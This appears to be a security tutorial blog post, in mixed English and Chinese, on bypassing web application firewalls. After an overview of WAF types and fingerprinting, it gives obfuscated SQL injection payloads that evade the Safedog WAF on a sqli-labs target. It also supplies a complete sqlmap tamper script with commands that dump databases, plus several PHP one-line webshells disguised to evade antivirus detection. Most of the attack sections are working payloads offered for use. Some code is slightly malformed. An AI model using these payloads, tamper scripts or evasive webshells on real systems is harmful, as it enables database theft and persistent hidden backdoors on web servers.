Article directory
Cybersecurity Law
WAF Bypass
Web applications will face many security risks, most of which are caused by the occurrence of Web vulnerabilities. Common Web security vulnerabilities:
-
SQL injection XSS CSRF
-
File system vulnerabilities: arbitrary file upload, arbitrary file reading, arbitrary file inclusion, arbitrary file deletion...directory traversal
-
Directory browsing
-
RCE
-
Deserialization vulnerability
-
Logic vulnerability: Invalid access control (override of authority)…
-
SSRF
-
Component security: Apache, IIS, Nginx…
For Web security protection, you need to use a security product, Web Application Firewall (WAF).
1. WAF
1.1 WAF Overview
The Chinese name of WAF (Web Application Firewall) is called "Web Application Firewall". Using an internationally recognized statement, the definition of WAF is as follows: Web Application Firewall is implemented by executing a series of targeted HTTP | HTTPS security policy is a product specifically designed to protect Web applications. From the above definition of WAF, we can clearly understand that WAF is a product that works at the application layer and specifically provides security protection for Web applications through specific security policies.
1.1.1 Common WAFs
Identify WAFs by looking at pictures - collecting common WAF interception pages .
1.1.2 WAF Category
According to different classification methods, WAF can be classified into many categories.
| Product form | illustrate | Typical products |
|---|---|---|
| Soft WAF | WAF is installed in the form of software on the protected server. Because it is installed on the server, it can access the files on the server and directly detect whether there is a WebShell on the server and whether files have been created. | Security Dog Cloud Lock D Shield |
| Hard WAF | It is deployed in the link in the form of hardware and supports multiple deployment methods. When connected in series to the link, it can intercept malicious traffic. In bypass listening mode, it only records attacks but does not intercept them. | Cloud Lock D Shield Thunder Pool |
| Cloud WAF | Generally, it works in the form of a reverse proxy. By configuring NS records or CNAME records, request packets for the website pass through the WAF host first. After being filtered by the WAF host, the request packets considered harmless are then sent to the actual website server for processing. Request can be said to be a CDN with protective function. | Alibaba Cloud Cloud Shield Tencent Cloud WAF Anheng Wudun |
| Built-in WAF | The WAF built into the website system can also be said to be the built-in filtering in the website system, which is directly embedded in the code. It has a relatively high degree of freedom and generally has the following situations. ● Input parameter type conversion (intval, etc.). ● Check the validity of input parameters. ● Before key functions are executed (SQL execution, page display, command execution, etc.), input through the code flow is detected. ● Replace and filter the input data before continuing to execute the code process (escaping/replacing special characters, etc.). The WAF built into the website system is more consistent with the business. If you have a good understanding of both security and business, you will receive fewer false positives and false negatives. |
WAF (Web Application Firewall) .
1.1.3 How WAF works
The WAF processing process can be roughly divided into four parts: preprocessing, rule detection, processing module, and logging.
| Processing flow | illustrate |
|---|---|
| preprocessing | In the preprocessing phase, when receiving data request traffic, it will first determine whether it is an HTTP/HTTPS request, and then check whether the URL request is in the whitelist. If the URL request is in the whitelist, it will be directly handed over to the backend Web The server performs response processing, parses the data packets that are not in the whitelist, and then enters the rule detection part. |
| Rule detection | Each WAF product has its own unique detection rule system. The parsed data packets will enter the detection system for rule matching to check whether the data request complies with the rules and identify malicious attacks. |
| processing module | For different detection results, the processing module will take different security defense actions. If the rules are met, it will be handed over to the back-end web server for response processing. For requests that do not meet the rules, relevant blocking, recording, and alarm processing will be performed. |
| Logging | WAF will also record the logs of interception processing during the processing process, so that users can view and analyze the logs in the future. |
1.1.4 WAF deployment method
- transparent bridge
- reverse proxy
- Mirror traffic
- routing agent
1.2 WAF fingerprint recognition
A "fingerprint" is a string or behavior of a specific characteristic.
| fingerprint characteristics | Field |
|---|---|
| Response status code | ‘405 method not allow’ |
| HTTP response message header fields | Server Cookie X-Powered-By special fields |
| Response text characteristics | 'errors.aliyun.com' 'waf.tencent-cloud.com' |
| behavior | Block response page |
1.2.1 WAF fingerprint identification tool
1.3 Various ways to circumvent WAF
- dirty data
- Case conversion
- Double write
- Inline comments
Summary of WAF mechanisms and bypass methods: Injection .
2. SQLi Bypass
2.1 Bypass idea
2.1.1 Level issues
-
architectural level
-
system level
-
Component level: HPP…
-
Code level: deformation, obfuscation...
-
WAF level
2.1.2 HTTP issues
- Malformed request: request method
- persistent link
- chunked transfer
2.2 Bypass analysis
| character | Bypass method |
|---|---|
| and | /*!14400and*/ |
| order by | /**/order/*/%0a*a*/by/**/ |
| union select | union/*!88888cas*/%a0/*/*!=*/select/**/ |
| database() | database(/*!/*/**%0fAJEST*/*/) |
| from information_schema.tables | /*!from--%0f/*%0ainformation_schema.tables*/ |
| from information_schema.columns | /*!from--%0f/*%0ainformation_schema.columns*/ |
| count(*) | count(1) |
以 sqli-labs/Less-1/ 为例:
在请求路径中添加脏数据进行绕过。
但是由于数据过大,导致URL超过了服务器的限制。
2.2.1 绕过方式
?id=1'/*!14400and*/ 1=1 --+
判断字段个数
?id=1'/**/order/*/%0a*a*/by/**/ 3 --+
判断回显
?id=1'union/*!88888cas*/%a0/*/*!=*/select/**/ 1,2,3 --+
获取数据库名
?id=1'/*!14400and*/ 1=2 union/*!88888cas*/%a0/*/*!=*/select/**/ 1,2,database(/*!/*/**%0fwuhu*/*/) --+
获取表名
?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,group_concat(table_name) /*!from--
%0f/*%0ainformation_schema.tables*/ where table_schema=database(/*!/*/**%0f*/*/) --+
获取表中字段
?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,group_concat(column_name) /*!from--
%0f/*%0ainformation_schema.columns*/ where table_schema=database(/*!/*/**%0f*/*/) /*!14400and*/
table_name='users'--+
获取用户名个数
?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,count(*) /*!from--%0f/*%0ausers*/--+
获取用户名和密码
?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,concat(username,0x3a,password) /*!from--
%0f/*%0ausers*/ limit 1,1--+
2.2.2 脚本编写
safedog_bypass.py
#!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
and
/*!-*/-/*and*/
order by
/**/order/*/%0a*a*/by/**/
union all select
/*!union/*/*!%0b-/*!88888cas*/select*/
from information_schema.tables
/*!from--%0f/*%0ainformation_schema.tables*/
from information_schema.SCHEMATA
/*!from--%0f/*%0ainformation_schema.SCHEMATA*/
from information_schema.columns
/*!from--%0f/*%0ainformation_schema.columns*/
[ as]
/*!14400as*/
char
/*!14400char*/
database\(\)
database(/*!/*/**WUHU%0f*/*/)
# --
"""
payload = re.sub(r'(?i)and', "/*!-*/-/*and*/", payload)
payload = re.sub(r'(?i)order by', "/**/order/*/%0a*a*/by/**/", payload)
payload = re.sub(r'(?i)union all select', "/*!union/*/*!%0b-/*!88888cas*/select*/", payload)
payload = re.sub(r'(?i)from information_schema.tables', "/*!from--%0f/*%0ainformation_schema.tables*/", payload)
payload = re.sub(r'(?i)from information_schema.columns', "/*!from--%0f/*%0ainformation_schema.columns*/", payload)
payload = re.sub(r'(?i)from information_schema.SCHEMATA', "/*!from--%0f/*%0ainformation_schema.SCHEMATA*/", payload)
payload = re.sub(r"(?i) as"," /*!14400as*/",payload)
payload = re.sub(r"(?i)char","/*!14400char*/",payload)
payload = re.sub(r"(?i)database\(\)","database(/*!/*/**WUHU%0f*/*/)",payload)
payload = re.sub(r"(?i)#","-- ",payload)
payload = re.sub(r"(?i)count\(*\)","count(1)",payload)
return payload
执行脚本
python .\sqlmap.py -u "http://192.168.188.187/sqli-labs/Less-1/?id=1" -v3 --tamper safedog_bypass --random-agent
说明:--random-agent 是在使用 sqlmap 工具时可以指定的一个选项。这个选项的作用是在发送请求时生成一个随机的 User-Agent 标头,以模拟不同的浏览器和用户代理。
python .\sqlmap.py -u "http://192.168.188.187/sqli-labs/Less-1/?id=1" -v3 --tamper safedog_bypass --random-agent --dbs
3. 一句话木马免杀
3.1 概述
3.1.1 查杀方式
- 静态检测
- 动态检测
3.1.2 绕过方式
- HTTP请求数据包变形:分块传送等。
- 一句话木马的变形,实现动态免杀。
3.2 Example
3.2.1 Example1
<?php
$ajest = base64_decode('绕Y过X安N全z狗Z我X最J棒0!');
$ajest($_REQUEST[777]);
?>
3.2.2 Example2
<?php
class Bypass{
public $name;
public $male;
function destruct ()
$a = $this->name;
$a($this->male);
}
}
unserialize($POST['777']);
//wuhu=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:20:"eval($_REQUEST["x"])";}
?>
3.2.3 Example3
<?php
$fruits = array("a" => "lemon", "ss" => "orange", "ssr" => "banana", "t" => "apple"); function test_alter(&$item1, $key, $prefix)
{
$item1 = "$prefix: $item1";
}
function test_print($item2, $key)
{
echo "$key. $item2<br />\n";
}
echo "Before ...:\n"; array_walk($fruits, 'test_print');
$a =array_keys($fruits); print_r($a);
$m =$a[0].$a[1];
$n ='er';
$q = $m.$n.'t'; //assert
$r = $_REQUEST['wuhu'];
@$q($r);
?>
3.2.3 Example4
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$b='_'.'P'.'O'.'S'.'T';
$c=$$b;
$a($c['x']);
?>